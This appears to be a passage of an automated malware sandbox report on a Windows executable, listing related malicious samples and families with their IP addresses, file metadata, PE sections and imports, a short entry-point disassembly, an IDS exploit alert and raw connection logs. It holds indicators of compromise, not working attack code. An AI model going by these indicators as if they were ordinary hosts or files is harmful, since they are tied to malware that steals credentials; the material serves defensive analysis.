                                              SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 185.199.109.133
                                              SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 185.199.110.133
                                              Payment slip.vbsGet hashmaliciousUnknownBrowse
                                              • 185.199.111.133
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.111.133
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.111.133
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 185.199.109.133
                                              api.ipify.org2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152
                                              2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                              • 104.26.13.205
                                              Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152
                                              Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                              • 172.67.74.152
                                              7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                              • 104.26.12.205
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              FranceTelecom-OrangeFRmpsl.elfGet hashmaliciousMiraiBrowse
                                              • 92.148.66.176
                                              arm4.elfGet hashmaliciousMiraiBrowse
                                              • 92.184.111.24
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 86.225.67.68
                                              ppc.elfGet hashmaliciousMiraiBrowse
                                              • 86.251.252.109
                                              sora.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 92.136.82.82
                                              sora.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 90.117.235.131
                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                              • 90.120.253.168
                                              nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                              • 92.140.8.96
                                              DbMBWMxoNv.exeGet hashmaliciousStealc, VidarBrowse
                                              • 2.2.2.2
                                              spc.elfGet hashmaliciousMiraiBrowse
                                              • 92.166.126.185
                                              CLOUDFLARENETUSPedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              20241104095027_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Order 54004308 - DewertOkin.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Transfer-X9_20241104_1255.PDF.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                              • 172.67.159.147
                                              QUOTATION_NOVQTRA071244.PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              https://ibnnafeeslab.com/i/?bGFuZz1lbiZzdj1nZW5lcmFsJnJib3g9ZnJhcmFtemk=#Get hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              JMFoyLSCjP.exeGet hashmaliciousStealc, VidarBrowse
                                              • 172.64.41.3
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                              • 172.67.133.135
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 172.64.41.3
                                              CLOUDFLARENETUSPedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              20241104095027_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Order 54004308 - DewertOkin.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Transfer-X9_20241104_1255.PDF.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                              • 172.67.159.147
                                              QUOTATION_NOVQTRA071244.PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              https://ibnnafeeslab.com/i/?bGFuZz1lbiZzdj1nZW5lcmFsJnJib3g9ZnJhcmFtemk=#Get hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              JMFoyLSCjP.exeGet hashmaliciousStealc, VidarBrowse
                                              • 172.64.41.3
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                              • 172.67.133.135
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 172.64.41.3
                                              FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.129.91
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.193.91
                                              https://r.mailing.campingcarpark.com/tr/cl/m2JPJkzPDbfL5s2bDabtlPRATYRQylIubPPupv_vc3kDzIWW2_TNYLb8YBmBuxxUamsx-FMq6iQDKP4aBiozKtmctIWJHvB_jMPMQCy2V9w9n7PdBiSom_VscfyxjRbqNIYqjqLTOUl5-9LarkHqAVm5L2wSo2oXxGVlFSK9ch7-9o3rO6zfaWOVTBYD4bj-cBh9D46nF7VLeW5JX646w9BMjGtwIbaonCu5pf0X8ov7yR1QFDHFtwW10C7XEoZag-1kPqsvroBYGdEMlwciu7AuBU1Y26NjgdB1vb4QnVOsIs_acQZJzGs0n3fybIY3bzcEJyP_Oy1jYqrav3I9lVVIjNjH0id0gdS4TbucLqy31-2RoRtZQc8bVuUs9GXZATyHwjK94EM9fKm3gaQ0u6Km4OhvabjJRJ1r26CvdUmHO1SK4HumQKUTUp8TXSmV-Stnpm_CGVl-UuJ0NvRq2I4Xw9uT__o0aJIGY71Xtr5Z7Y_et8YZZEgYR8N-C3PmDstWGdA9-IDO6X1D8sJVLEuj4ynD4q9-hO3nCsqHsDxKxs0cmE6rNpf8r-UvD1nXZ_a-VWCTi1NHu4b8MXaBheK-JZ2q5hHvkeAVzUdiXCOufUWyY-Ee97OlTdt1Y3IjIn0dj-CvUR17EtHIzPpKzFbJHJuSBA7gKlgbAXP5qj9Z9DYOs3fd4_dxBHDc4hFtPyERTdDEp75X34mcet-FOG2cCg6GELttByElL4HvrmfIJOs_BaLRaeRpYLsj2tIjMzr0T4OVWHBOW-Q1-iqoT_zCsmcuYUhzpgTIqTGpvB7QFG0i3ZF3aeteqWLx1NAZYNeYfLSsmOWLZWMqQuWpJNh5nxTAhUC-Ine_ExnFOYwfU5uvTSRkQ3WnzaJTik6lH8zjYuRq0R9zqImSml6gks4xbe9VZFCW-qtDzZihL-bjo2pnAM-z6PAC_JoDVrKTvQZZFhm5dMQTMyyNpmiJG_1gQ1xJxfcTrHmgDYLfGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.2.137
                                              http://r.srvtrck.com/v1/redirect?url=http://www.ritual.com&api_key=2787b73d6d1c026b48687320e239182a&site_id=e5c21d0795544b439bdb70bae77167c9&type=url&yk_tag=973511c5431487e8a29276d8e592449dGet hashmaliciousUnknownBrowse
                                              • 151.101.64.84
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.65.91
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.129.91
                                              PO.htmlGet hashmaliciousUnknownBrowse
                                              • 151.101.1.229
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.129.91
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.1.91
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 151.101.1.91
                                              No context
                                              No context
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.7307872139132228
                                              Encrypted:false
                                              SSDEEP:3:NlllulF/lll:NllUF/ll
                                              MD5:3ECB05F56210644B241FF459B861D309
                                              SHA1:1A33420F5866C42A5ED3CFF0DD505451FBFA8072
                                              SHA-256:712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
                                              SHA-512:79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e.................................^.........................
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                              Entropy (8bit):6.223005129526667
                                              TrID:
                                              • Win64 Executable Console (202006/5) 92.65%
                                              • Win64 Executable (generic) (12005/4) 5.51%
                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                              • DOS Executable Generic (2002/1) 0.92%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CFuejz2dRu.exe
                                              File size:6'226'432 bytes
                                              MD5:020b08da71b11949586b7a6185877b13
                                              SHA1:518117166ae0bab4b79d483e8de9c11e6b38ff50
                                              SHA256:5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f
                                              SHA512:b689cf9f3b6b0dd78a7080f562fff1a4006bbf0482ac80a535b136e0286703d9ddeb5faa3e0c4ae6b8fe5a21fdd6fe642cd1a39c1f1338ee43fd588523a6f7e8
                                              SSDEEP:49152:JvEjmmgTOcm+7l0yI1k//veUZIu/Hg7KUIG03oSuNG1jR5EjMWctqYusNz5U4mlE:l7lae/Hg+JJXVE7BXsVp
                                              TLSH:EC564907EDE545E8C0AED2758A629253BE717C494B3123E72B60F7382F76BD06A79340
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........._.......".......,.........`E........@..............................0d...........`... ............................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x474560
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:1
                                              File Version Major:6
                                              File Version Minor:1
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:1
                                              Import Hash:d42595b695fc008ef2c56aabd8efd68e
                                              Instruction
                                              jmp 00007F2F28DFC260h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              dec eax
                                              mov ebp, esp
                                              pushfd
                                              cld
                                              dec eax
                                              sub esp, 000000E0h
                                              dec eax
                                              mov dword ptr [esp], edi
                                              dec eax
                                              mov dword ptr [esp+08h], esi
                                              dec eax
                                              mov dword ptr [esp+10h], ebp
                                              dec eax
                                              mov dword ptr [esp+18h], ebx
                                              dec esp
                                              mov dword ptr [esp+20h], esp
                                              dec esp
                                              mov dword ptr [esp+28h], ebp
                                              dec esp
                                              mov dword ptr [esp+30h], esi
                                              dec esp
                                              mov dword ptr [esp+38h], edi
                                              movups dqword ptr [esp+40h], xmm6
                                              movups dqword ptr [esp+50h], xmm7
                                              inc esp
                                              movups dqword ptr [esp+60h], xmm0
                                              inc esp
                                              movups dqword ptr [esp+70h], xmm1
                                              inc esp
                                              movups dqword ptr [esp+00000080h], xmm2
                                              inc esp
                                              movups dqword ptr [esp+00000090h], xmm3
                                              inc esp
                                              movups dqword ptr [esp+000000A0h], xmm4
                                              inc esp
                                              movups dqword ptr [esp+000000B0h], xmm5
                                              inc esp
                                              movups dqword ptr [esp+000000C0h], xmm6
                                              inc esp
                                              movups dqword ptr [esp+000000D0h], xmm7
                                              inc ebp
                                              xorps xmm7, xmm7
                                              dec ebp
                                              xor esi, esi
                                              dec eax
                                              mov eax, dword ptr [005A686Ah]
                                              dec eax
                                              mov eax, dword ptr [eax]
                                              dec eax
                                              cmp eax, 00000000h
                                              je 00007F2F28DFFB45h
                                              dec esp
                                              mov esi, dword ptr [eax]
                                              dec eax
                                              sub esp, 10h
                                              dec eax
                                              mov eax, ecx
                                              dec eax
                                              mov ebx, edx
                                              call 00007F2F28E07CBBh
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6330000x53e.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6220000xfaf8.pdata
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6340000xd514.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x5872c00x178.data
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x2c0cb60x2c0e00305ded77af37fc26e1a6d0e9cabf77b8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x2c20000x2c4cb00x2c4e00b7434947c6fbaf86a0701b74b58a9076unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x5870000x9a2800x4c400320a4e9be796356f5efcd0474fc81582False0.3548603995901639data4.615330934451555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .pdata0x6220000xfaf80xfc00f6cc8a59cf42294aa2c5ca3994ba844aFalse0.40425037202380953data5.454703654049661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .xdata0x6320000xb40x2009e81c921791a8bc9a30e7697581d2891False0.2265625shared library1.783206012798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .idata0x6330000x53e0x600dbdd8541e58ca4674adb1c8f14d45ee0False0.3756510416666667OpenPGP Public Key3.9721343948481436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .reloc0x6340000xd5140xd600e5133074e696207666dc8d8dd6fbfbe4False0.24766355140186916data5.41768855761573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              .symtab0x6420000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              DLLImport
                                              kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-04T16:24:57.739368+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.862044TCP
                                              2024-11-04T16:25:35.948910+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.862049TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 4, 2024 16:24:40.998645067 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:40.998693943 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:40.998754978 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:40.999434948 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:40.999452114 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.405136108 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.405200958 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.405272007 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.405281067 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.405333042 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.525787115 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.525826931 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.525867939 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.525873899 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.526014090 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.526017904 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.651349068 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.651899099 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.651907921 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.656265974 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.703818083 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:42.731096983 CET44349704104.26.13.205192.168.2.8
                                              Nov 4, 2024 16:24:42.770586967 CET49704443192.168.2.8104.26.13.205
                                              Nov 4, 2024 16:24:43.938407898 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:43.938446999 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:43.938508034 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:43.939043045 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:43.939073086 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.768902063 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.830188990 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:44.831800938 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:44.831823111 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.832079887 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:44.832087994 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.833729982 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.833744049 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.833801031 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:44.884232044 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:44.884346008 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.884440899 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:44.884460926 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:44.935866117 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.054898977 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.054951906 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.054980993 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.055006027 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.055028915 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.055049896 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.055069923 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.055099010 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.056119919 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.056139946 CET44349705185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.056169033 CET49705443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.057470083 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.057542086 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.057637930 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.058649063 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.058667898 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.870503902 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.870908022 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.870937109 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.871165037 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.871171951 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.872268915 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.872337103 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.879204035 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.879271030 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.879376888 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:45.879390001 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:45.927018881 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.088824034 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.088901043 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.088927031 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.088953018 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.088978052 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.089004040 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.089093924 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.089093924 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.089116096 CET44349706185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.089354992 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.089391947 CET49706443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.092948914 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.092986107 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:46.093060017 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.093530893 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:46.093547106 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.165121078 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.165493965 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.165504932 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.165618896 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.165622950 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.166716099 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.166776896 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.167937994 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.168016911 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.168047905 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.211333036 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.215384960 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.215399981 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.263122082 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.333756924 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.333800077 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.333862066 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.333931923 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.333956003 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.333997965 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.334099054 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.334116936 CET44349707185.199.108.133192.168.2.8
                                              Nov 4, 2024 16:24:47.334137917 CET49707443192.168.2.8185.199.108.133
                                              Nov 4, 2024 16:24:47.378063917 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:47.378120899 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:47.378252029 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:47.378647089 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:47.378664017 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.217571020 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.218059063 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.218094110 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.218127012 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.218132973 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.219163895 CET44349708188.114.97.3192.168.2.8
                                              Nov 4, 2024 16:24:48.219250917 CET49708443192.168.2.8188.114.97.3
                                              Nov 4, 2024 16:24:48.220237970 CET49708443192.168.2.8188.114.97.3
